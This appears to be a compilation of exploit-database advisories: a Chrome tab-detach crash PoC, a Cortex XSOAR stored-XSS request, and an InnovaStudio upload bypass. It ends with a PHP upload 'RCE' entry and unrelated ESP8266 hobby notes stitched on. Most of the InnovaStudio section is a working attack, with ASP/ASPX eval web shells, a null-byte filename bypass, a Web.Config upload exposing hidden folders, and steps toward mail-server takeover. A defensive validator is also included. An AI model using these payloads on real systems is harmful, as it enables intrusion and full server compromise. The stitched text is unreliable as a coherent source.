## Exploit Title: Google Chrome Browser 111.0.5563.64 - AXPlatformNodeCocoa Fatal OOM/Crash (macOS)
## Exploit Author: LiquidWorm
Vendor: Google LLC
Product web page: https://www.google.com
Affected version: 111.0.5563.64 (Official Build) (x86_64)
                  110.0.5481.100 (Official Build) (x86_64)
                  108.0.5359.124 (Official Build) (x86_64)
                  108.0.5359.98 (Official Build) (x86_64)
Fixed version: 112.0.5615.49 (Official Build) (x86_64)
Summary: Google Chrome browser is a free web browser used for
accessing the internet and running web-based applications. The
Google Chrome browser is based on the open source Chromium web
browser project. Google released Chrome in 2008 and issues several
updates a year.
Desc: Fatal OOM/crash of Chrome browser while detaching/attaching
tabs on macOS.
Commit fix:
"The original cl landed many months ago, but
chrome/browser/ui/views/frame/browser_non_client_frame_view_mac.mm
is the only change that didn't revert cleanly."
macOS a11y: Implement accessibilityHitTest for remote app shims (PWAs)
Implements accessibility hit testing for RemoteCocoa so that Hover Text
and VoiceOver mouse mode can read the accessible objects under the
user's pointer. Cross-process plumbing was needed because RemoteCocoa
bridges to native controls in a separate app shim process and must
report accessibility trees from the browser process via the
undocumented NSAccessibilityRemoteUIElement mechanism.
This CL does the following:
1. Unblocks remote accessibilityHitTest by calling setRemoteUIApp:YES
in the browser process. This enables the browser process to accept
redirected accessibilityHitTest calls to the object corresponding to
any NSAccessibilityRemoteUIElement returned by the original
accessibilityHitTest at the app shim process.
2. (For Browser UI) Overrides NativeWidgetMacNSWindowTitledFrame's
accessibilityHitTest to have a custom implementation with
NSAccessibilityRemoteUIElement support so that custom window
controls can be found. Additionally, adjusts the BrowserView bounds
so that AXPlatformNodeCocoa's accessibilityHitTest (which doesn't
support view targeting) can return controls in the web app frame
toolbar.
3. (For Web Content) Implements RenderWidgetHostViewCocoa's
accessibilityHitTest for instances in the app shim to return a
NSAccessibilityRemoteUIElement corresponding to their counterparts
in the browser process so that web content objects can be found.
Tested on: macOS 12.6.1 (Monterey)
           macOS 13.3.1 (Ventura)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5770
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5770.php
08.12.2022
--
UI PoC:
-------
1. Grab a tab and detach it.
2. Bring back the tab.
3. Do this 2-3 times attaching / re-attaching the tab.
4. Chrome will hang (100% CPU) / Out-of-Memory (OOM) for 7-8 minutes.
5. Process crashes entirely.
Ref: Issue 1400682 (Ticket created: Dec 13, 2022)
Ref: https://bugs.chromium.org/p/chromium/issues/detail?id=1400682
Ref: https://chromium-review.googlesource.com/c/chromium/src/+/3861171
Ref: axtester.mm terminal PoC by xi.ch...@gmail.com (https://bugs.chromium.org/u/161486905)
=============
//
// Copyright (c) Microsoft Corporation. All rights reserved.
//
#include <ApplicationServices/ApplicationServices.h>
#include <cstdlib>    // exit()
#include <iostream>
#include <sstream>
#include <string>
#include <unistd.h>   // isatty(), STDOUT_FILENO
#include <vector>

__BEGIN_DECLS
// Private (undocumented) AX entry points; declared here so the file links
// against ApplicationServices without a public header.
// NOLINTNEXTLINE
AXError _AXUIElementGetWindow(AXUIElementRef, CGWindowID *);
// NOLINTNEXTLINE
CFTypeID AXTextMarkerGetTypeID();
__END_DECLS

// Terminal bold on/off, only when stdout is a TTY.
std::ostream& bold_on(std::ostream& os)
{
    if (isatty(STDOUT_FILENO))
    {
        return os << "\033[1m";
    }
    return os;
}

std::ostream& bold_off(std::ostream& os)
{
    if (isatty(STDOUT_FILENO))
    {
        return os << "\033[0m";
    }
    return os;
}

// Convert a CFString (or anything else, yielding "") to a UTF-8 std::string.
std::string from_cfstr(CFTypeRef cf_ref)
{
    if (cf_ref != nullptr && CFGetTypeID(cf_ref) == CFStringGetTypeID())
    {
        const auto cf_str = static_cast<CFStringRef>(cf_ref);
        const auto max_length = static_cast<size_t>(CFStringGetMaximumSizeForEncoding(
            CFStringGetLength(cf_str), kCFStringEncodingUTF8)) + 1;
        auto result = std::string(max_length, '\0');
        if (CFStringGetCString(cf_str, result.data(), static_cast<CFIndex>(max_length), kCFStringEncodingUTF8))
        {
            if (const auto pos = result.find('\0'); pos != std::string::npos)
            {
                result.resize(pos);
            }
            return result;
        }
    }
    return {};
}

// Assign (and remember) a UUID per distinct AX element.
std::string ax_element_id(AXUIElementRef value)
{
    // AX element cache - AX elements are backed by CFData
    // (referring to 'remote' AX objects) and this data is
    // 'stable' across 'volatile' instances of AXUIElement.
    // 'hash and equality' of AX elements are based on this
    // data and therefore, we can use AXUIElement objects as
    // 'keys' in a dictionary with values, identifying these
    // objects (uniquely).
    const static auto ax_elements = CFDictionaryCreateMutable(kCFAllocatorDefault, 0,
        &kCFTypeDictionaryKeyCallBacks, &kCFTypeDictionaryValueCallBacks);
    auto ax_id = CFDictionaryGetValue(ax_elements, value);
    if (ax_id == nullptr)
    {
        if (const auto uuid = CFUUIDCreate(kCFAllocatorDefault))
        {
            if (const auto uuid_s = CFUUIDCreateString(kCFAllocatorDefault, uuid))
            {
                CFDictionarySetValue(ax_elements, value, uuid_s);
                CFRelease(uuid_s);
            }
            CFRelease(uuid);
        }
        ax_id = CFDictionaryGetValue(ax_elements, value);
    }
    return from_cfstr(ax_id);
}

// Copy one attribute of an AX element; the caller owns (and must CFRelease) the result.
template <typename T>
T ax_attribute_value(AXUIElementRef e, CFStringRef name)
{
    if (e != nullptr)
    {
        auto ref = T{};
        if (AXUIElementCopyAttributeValue(e, name, (CFTypeRef *) &ref) == kAXErrorSuccess)
        {
            return ref;
        }
    }
    return nullptr;
}

// Depth-first walk of the accessibility tree, printing role, id and window per node.
// NOLINTNEXTLINE
void ax_traverse(AXUIElementRef elem, uint32_t depth)
{
    const auto max_depth = 10;
    if (depth > max_depth)
    {
        return;
    }
    const auto indent = [&]()
    {
        for (auto x = uint32_t{0}; x < depth; x++)
        {
            std::cout << " ";
        }
    };
    auto wid = CGWindowID{};
    if (_AXUIElementGetWindow(elem, &wid) != kAXErrorSuccess)
    {
        wid = 0;
    }
    indent();
    const auto role = ax_attribute_value<CFTypeRef>(elem, kAXRoleAttribute);
    std::cout << bold_on << "[*** DEPTH: " << depth << ", ROLE: " << from_cfstr(role) <<
        ", ID: " << ax_element_id(elem) << ", WINDOW: " << wid << " ***]" << bold_off <<
        std::endl;
    if (role != nullptr)
    {
        CFRelease(role);
    }
    if (const auto children = ax_attribute_value<CFArrayRef>(elem, kAXChildrenAttribute))
    {
        for (CFIndex idx = 0; idx < CFArrayGetCount(children); idx++)
        {
            const auto element = static_cast<AXUIElementRef>(CFArrayGetValueAtIndex(children, idx));
            ax_traverse(element, depth + 1);
        }
        CFRelease(children);
    }
}

int main(int argc, char* const argv[])
{
    auto pid = 0;
    if (argc > 1)
    {
        if (!AXIsProcessTrusted())
        {
            std::cerr << "Please 'AX approve' Terminal in System Preferences" << std::endl;
            exit(1); // NOLINT
        }
        // NOLINTNEXTLINE
        pid = std::stoi(argv[1]);
    }
    else
    {
        std::cerr << "usage: axtester <pid>" << std::endl;
        exit(1); // NOLINT
    }
    if (const auto app = AXUIElementCreateApplication(pid))
    {
        auto observer = AXObserverRef{};
        // The observer callback re-walks the whole tree on every notification;
        // the application element is passed through as the context pointer.
        auto ret = AXObserverCreate(pid, [](AXObserverRef /*unused*/, AXUIElementRef /*unused*/, CFStringRef name, void* ctx)
        {
            const auto myapp = static_cast<AXUIElementRef>(ctx);
            // from_cfstr() copies the string; CFStringGetCStringPtr() may return NULL.
            std::cout << "Hint: " << from_cfstr(name) << std::endl;
            ax_traverse(myapp, 0);
        }, &observer);
        if (kAXErrorSuccess != ret)
        {
            std::cerr << "Fail to create observer" << std::endl;
            return -1;
        }
        std::cout << "title:" << AXObserverAddNotification(observer, app, kAXTitleChangedNotification, (void*)app) << std::endl;
        std::cout << "focus_window:" << AXObserverAddNotification(observer, app, kAXFocusedWindowChangedNotification, (void*)app) << std::endl;
        std::cout << "focus_element:" << AXObserverAddNotification(observer, app, kAXFocusedUIElementChangedNotification, (void*)app) << std::endl;
        std::cout << "move:" << AXObserverAddNotification(observer, app, kAXWindowMovedNotification, (void*)app) << std::endl;
        std::cout << "resize:" << AXObserverAddNotification(observer, app, kAXWindowResizedNotification, (void*)app) << std::endl;
        std::cout << "deminiaturized:" << AXObserverAddNotification(observer, app, kAXWindowDeminiaturizedNotification, (void*)app) << std::endl;
        std::cout << "miniaturize:" << AXObserverAddNotification(observer, app, kAXWindowMiniaturizedNotification, (void*)app) << std::endl;
        CFRunLoopAddSource(CFRunLoopGetCurrent(), AXObserverGetRunLoopSource(observer), kCFRunLoopDefaultMode);
        CFRunLoopRun();
    }
    return 0;
}
--codeaibot explains--
This is a C++ program that uses the Accessibility API (AX) provided
by macOS to traverse the user interface of a running application and
print out information about the accessibility elements that it finds.
The program takes a single argument, which is the process ID (PID) of
the application to examine. If no argument is provided, the program
displays a usage message and exits.
The main() function first checks if the Terminal app has been granted
accessibility privileges by calling the AXIsProcessTrusted() function.
If it hasn't, the program displays an error message and exits.
If the Terminal app has been granted accessibility privileges, the program
creates an AXUIElementRef object for the application using the AXUIElementCreateApplication()
function, passing in the PID as an argument.
The program then registers an AXObserver for title, focus, move, resize and
miniaturize notifications of that application. Each time one of them fires,
the observer callback calls ax_traverse() with the application's root
accessibility element; this function recursively traverses the accessibility
tree of the application (to a depth of 10), printing out information about
each element it encounters.
The program also defines several helper functions for working with Core
Foundation types (from_cfstr(), ax_element_id(), and ax_attribute_value()),
as well as some functions for printing formatted output to the console
(bold_on() and bold_off()).
-- / --
As this issue is not a security issue nor results in security consequences,
this report is not eligible for a VRP reward.
++
Thank you Amy!
--
# Exploit Title: Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS)
# Exploit Author: omurugur
# Vendor Homepage: https://security.paloaltonetworks.com/CVE-2022-0020
# Version: 6.5.0 - 6.2.0 - 6.1.0
# Tested on: [relevant os]
# CVE : CVE-2022-0020
# Author Web: https://www.justsecnow.com
# Author Social: @omurugurrr
A stored cross-site scripting (XSS) vulnerability in the Palo Alto Networks
Cortex XSOAR web interface enables an authenticated network-based attacker
to store a persistent JavaScript payload that will perform arbitrary
actions in the Cortex XSOAR web interface on behalf of authenticated
administrators who encounter the payload during normal operations.
POST /acc_UAB(MAY)/incidentfield HTTP/1.1
Host: x.x.x.x
Cookie: XSRF-TOKEN=xI=; inc-term=x=; S=x+x+x+x/x==; S-Expiration=x;
isTimLicense=false
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0)
Gecko/20100101 Firefox/94.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://x.x.x.x/acc_UAB(MAY)
Content-Type: application/json
X-Xsrf-Token:
Api_truncate_results: true
Origin: https://x.x.x.x
Content-Length: 373
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
{"associatedToAll":true,"caseInsensitive":true,"sla":0,"shouldCommit":true,"threshold":72,"propagationLabels":["all"],"name":"\"/><svg/onload=prompt(document.domain)>","editForm":true,"commitMessage":"Field
edited","type":"html","unsearchable":false,"breachScript":"","shouldPublish":true,"description":"\"/><svg/onload=prompt(document.domain)>","group":0,"required":false}
Regards,
Omur UGUR
# Exploit Title: InnovaStudio WYSIWYG Editor 5.4 - Unrestricted File Upload / Directory Traversal
# Date: 11/04/2023
# Exploit Author: Zer0FauLT [admindeepsec@proton.me]
# Vendor Homepage: innovastudio.com
# Product: Asset Manager
# Version: <= Asset Manager ASP Version 5.4
# Tested on: Windows 10 and Windows Server 2019
# CVE : 0DAY
##################################################################################################
# #
# ASP version, in i_upload_object_FSO.asp, line 234 #
# #
# oUpload.AllowedTypes = "gif|jpg|png|wma|wmv|swf|doc|zip|pdf|txt" #
# #
##################################################################################################
||==============================================================================||
|| ((((1)))) ||
|| ||
|| ...:::We try uploading ASP/ASPX/PHP/CER and other shell file extensions:::... ||
||==============================================================================||
##################################################################################################
" "
" FILE PERMISSIONS : [ 0644 ] "
" "
" DIR PERMISSIONS : [ 0755 ] "
" "
" UPLOAD FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ] "
" "
##################################################################################################
==================================================================================================
POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
Host: www.pentest.com
Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
Content-Length: 473
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://www.pentest.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpCurrFolder2"
C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpFilter"
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="File1"; filename="shell.asp"
Content-Type: application/octet-stream
<%eval request("#11")%>
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS--
==================================================================================================
" ...[ RESPONSE ]... "
" "
" ASP-ASPX-PHP-CER-OTHER FILE EXTENSIONS to types is not allowed. "
" "
==================================================================================================
***
||================================================================================||
|| ((((2)))) ||
|| ||
|| ...:::Now we will manipulate the filename: ===>>> filename="shell.asp":::... ||
|| ||
||================================================================================||
##################################################################################################
" "
" FILE PERMISSIONS : [ 0644 ] "
" "
" DIR PERMISSIONS : [ 0755 ] "
" "
" UPLOAD FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ] "
" "
##################################################################################################
==================================================================================================
POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
Host: www.pentest.com
Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
Content-Length: 473
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://www.pentest.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpCurrFolder2"
C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpFilter"
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="File1"; filename="shell.asp%00asp.txt"
Content-Type: application/octet-stream
<%eval request("#11")%>
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS--
==================================================================================================
" >>> filename="shell.asp%00asp.txt" <<< "
" "
" [ %00 ] ===> Select these characters > Right Click > Convert Selection > URL > URL-decode "
" "
" or "
" "
" CTRL+Shift+U "
" "
" SEND! "
" "
==================================================================================================
" ...[ RESPONSE ]... "
" "
" OK! "
" "
" UPLOADED FOLDER: [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets\shell.asp ] "
" "
" SHELL PATH: https://www.pentest.com/editor/assets/shell.asp/aspx/php/cer/[Unrestricted] "
" "
==================================================================================================
***
||==============================================================================||
|| ((((3)))) ||
|| ||
|| ...:::NO WRITE PERMISSION!:::... ||
|| ||
|| ...:::Directory Traversal:::... ||
|| ||
||==============================================================================||
##################################################################################################
" "
" FILE PERMISSIONS : [ 0600 ] "
" "
" DEFAULT DIR[\Editor\assets] PERMISSIONS : [ 0700 ] "
" "
" OTHER[App_Data] DIR PERMISSIONS : [ 0777 ] "
" "
" DEFAULT FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ] "
" "
" App_Data FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data ] "
" "
" TEST WORK DIR : https://www.pentest.com/App_Data <<<= [ 404 ERROR - N/A ] "
" "
" "
##################################################################################################
##########################################################################################################################################
# #
# What is the App_Data folder useful for? #
# App_Data contains application data files, including .mdf database files, XML files, and other data store files. #
# The App_Data folder is used by ASP.NET to store an application's local database, such as the database for maintaining membership and role information. #
# The App_Data folder is not public like the other website directories under the home directory. #
# Because it is a private directory, the IIS server hides it for security reasons. #
# Now we will test whether such a directory exists. #
# If the directory exists, we will make it public so that we can define the server settings needed to run a shell inside it. #
# To do this we will try to upload a special server configuration file, a Web.Config file. With it we bypass the directory's hidden status. #
# The directory then becomes public, responds to external requests and can run a shell. #
# #
##########################################################################################################################################
==================================================================================================
POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
Host: www.pentest.com
Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
Content-Length: 473
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://www.pentest.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpCurrFolder2"
C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpFilter"
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="File1"; filename="Web.Config%00net.txt"
Content-Type: application/octet-stream
<configuration>
<system.webServer>
<defaultDocument>
<files>
<add value="*.asp" />
<add value="*.aspx" />
<add value="*.php" />
</files>
</defaultDocument>
<security>
<requestFiltering>
<hiddenSegments>
<clear />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS--
==================================================================================================
" ...[ RESPONSE ]... "
" "
" OK! "
" "
" UPLOADED FOLDER: [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data\Web.Config ] "
" "
" TEST WORK for App_Data DIR : https://www.pentest.com/App_Data <<<= [ 403 ERROR - OK. ] "
" "
==================================================================================================
# Now we will upload our shell to the directory where we applied the bypass. #
==================================================================================================
POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
Host: www.pentest.com
Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
Content-Length: 473
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://www.pentest.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpCurrFolder2"
C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpFilter"
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="File1"; filename="shell.aspx%00aspx.txt"
Content-Type: application/octet-stream
<%@PAGE LANGUAGE=JSCRIPT EnableTheming = "False" StylesheetTheme="" Theme="" %>
<%var PAY:String=
Request["\x61\x62\x63\x64"];eval
(PAY,"\x75\x6E\x73\x61"+
"\x66\x65");%>
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS--
======================================================================================================
" ...[ RESPONSE ]... "
" "
" OK! "
" "
" UPLOADED FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data\shell.aspx ] "
" "
" TEST WORK for Shell : https://www.pentest.com/App_Data/shell.aspx <<<= [ OK. ] "
" "
==========================================================================================================================================
" "
" So what can we do if no directory on the site has write permission? "
" In that case, we test for vulnerabilities in the paths of other applications running on the server. "
" Sometimes this can be a mail service related vulnerability, "
" sometimes it can also be a "Service Permissions" vulnerability, "
" sometimes a "Binary Permissions" vulnerability, "
" sometimes a "Weak Service Permissions" vulnerability, "
" and sometimes an "Unquoted Service Path" vulnerability. "
" Our limits are as much as our imagination... "
" *** 0DAY *** "
" Ok. Now we will reinforce the lesson with an example of a vulnerability in the SmarterMail service. "
" We saw that the SmarterMail service was installed on our IIS server and detected a critical security vulnerability in this service. "
" TEST WORK for SmarterMail Service: [ http://mail.pentest.com/interface/root#/login ] "
" Data directory for this SmarterMail: [ C:\Program Files (x86)\SmarterTools\SmarterMail\MRS\App_Data ] "
" As shown above, we can first navigate to the App_Data directory belonging to the SmarterMail service, "
" and then upload our shell file to the server by bypassing it. "
" This way, we will have full control over both the server and the mail service. "
" Shell Path: [ http://mail.pentest.com/App_Data/shell.aspx ] "
" "
==========================================================================================================================================
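As an added, defender-side illustration (not code from the advisory or from InnovaStudio), the Python below contrasts the last-extension check the advisory defeats with a validator that rejects the three failure modes walked through above: the null byte in the filename, the reserved Web.Config name, and a client-supplied folder (inpCurrFolder2) that resolves outside the upload root. The function names and UPLOAD_ROOT are assumptions; the allow-list and paths are the ones quoted in the advisory.

```python
import ntpath
from urllib.parse import unquote

# Allow-list copied from the advisory's i_upload_object_FSO.asp (line 234).
ALLOWED_TYPES = "gif|jpg|png|wma|wmv|swf|doc|zip|pdf|txt"
ALLOWED_EXT = frozenset(ALLOWED_TYPES.split("|"))

# Names IIS / ASP.NET interpret as configuration; an upload must never create them.
RESERVED_NAMES = frozenset({"web.config", "global.asax", "global.asa"})

# Assumed upload root; the path itself is the one quoted in the advisory.
UPLOAD_ROOT = r"C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets"


def naive_extension_ok(filename: str) -> bool:
    """The weak check: only the text after the last '.' is compared.

    'shell.asp%00asp.txt' decodes to 'shell.asp\\x00asp.txt'; its last extension is
    'txt', so this returns True, while a C-string based filesystem API stops at the
    NUL and actually creates 'shell.asp'.
    """
    name = unquote(filename)
    return name.rsplit(".", 1)[-1].lower() in ALLOWED_EXT


def dir_inside_root(target_dir: str, upload_root: str = UPLOAD_ROOT) -> bool:
    """True if a client-supplied directory resolves to upload_root or below it.

    ntpath is used on purpose so the Windows path semantics of the advisory
    (backslashes, case-insensitivity, '..' segments) apply on any host.
    """
    root = ntpath.normcase(ntpath.normpath(upload_root))
    target = ntpath.normcase(ntpath.normpath(target_dir))
    return target == root or target.startswith(root + "\\")


def validate_upload(filename: str, target_dir: str, upload_root: str = UPLOAD_ROOT):
    """Hardened check; returns (accepted, reason).

    The safest server never trusts a client folder at all; the directory check
    is here to show what goes wrong when it does.
    """
    name = unquote(filename)
    if "\x00" in name:
        return False, "null byte in filename"
    if "/" in name or "\\" in name or ".." in name:
        return False, "path separator or traversal in filename"
    if name.lower() in RESERVED_NAMES:
        return False, "reserved server file name"
    stem, dot, ext = name.rpartition(".")
    if not dot or not stem or not ext:
        return False, "missing extension"
    if ext.lower() not in ALLOWED_EXT:
        return False, f"extension {ext!r} not allowed"
    # Double extensions such as shell.asp.txt: every inner extension must be allowed too.
    for inner in stem.split(".")[1:]:
        if inner and inner.lower() not in ALLOWED_EXT:
            return False, f"inner extension {inner!r} not allowed"
    if not dir_inside_root(target_dir, upload_root):
        return False, "target directory outside upload root"
    return True, "ok"
```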
## Exploit Title: Online-Pizza-Ordering -1.0 - Remote Code Execution (RCE)
## Author: nu11secur1ty
## Date: 03.30.2023
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html
## Reference: https://portswigger.net/web-security/file-upload
## Description:
The malicious user can request an account from the administrator of
this system.
Then he can use this vulnerability to destroy or get access to all
accounts of this system, even more, worst than ever.
The malicious user can upload a very dangerous file on this server,
and he can execute it via shell,
this is because he can access the upload function from the
administrator account.
The status is CRITICAL.
STATUS: HIGH Vulnerability
[+]Exploit:
```php
<?php
// by nu11secur1ty - 2023
// Old Name Of The file
$old_name = "C:/xampp7/htdocs/pwnedhost17/php-opos17" ;
// New Name For The File
$new_name = "C:/xampp7/htdocs/pwnedhost17/php-opos" ;
// using rename() function to rename the file
rename( $old_name, $new_name) ;
?>
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Online-Pizza-Ordering-1.0)
## Proof and Exploit:
[href](https://streamable.com/szb9qy)
## Time spend:
00:45:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
nu11secur1ty <http://nu11secur1ty.com/>

Title: esp8266 Relay WiFi
Equipment list: one esp8266 board; software: ESP8266Flasher
Instructions:
1. Download the firmware to be flashed first: the esp8266 wifi relay firmware.
2. In that firmware, 0x00000.bin is written to address 0x00000 and 0x10000.bin is written to address 0x10000 (as shown in the figure).
3. After flashing completes, an access point with the SSID MYAP appears.
4. Connect to it and open 192.168.4.1 to configure.
Internet speed test
Advantages and disadvantages. Advantages: small and convenient, simple and practical, and above all cheap. Disadvantages: low efficiency, easy to disconnect, and slow network speed.
Title: esp8266(nodemcu) +DHT11 temperature and humidity sensor
Equipment list
One NodeMCU development board, one DHT11 temperature and humidity sensor
(DHT11 module)
(NodeMcu board)
The DHT11 detects water vapor by measuring the resistance between two electrodes. The humidity sensing component is a moisture-absorbing substrate with electrodes on its surface.
When water vapor is absorbed by the substrate, ions are released by the substrate, and this process increases the conductivity between the electrodes.
The resistance change between the two electrodes is proportional to the relative humidity.
Higher relative humidity reduces the resistance between the electrodes, while lower relative humidity increases it.
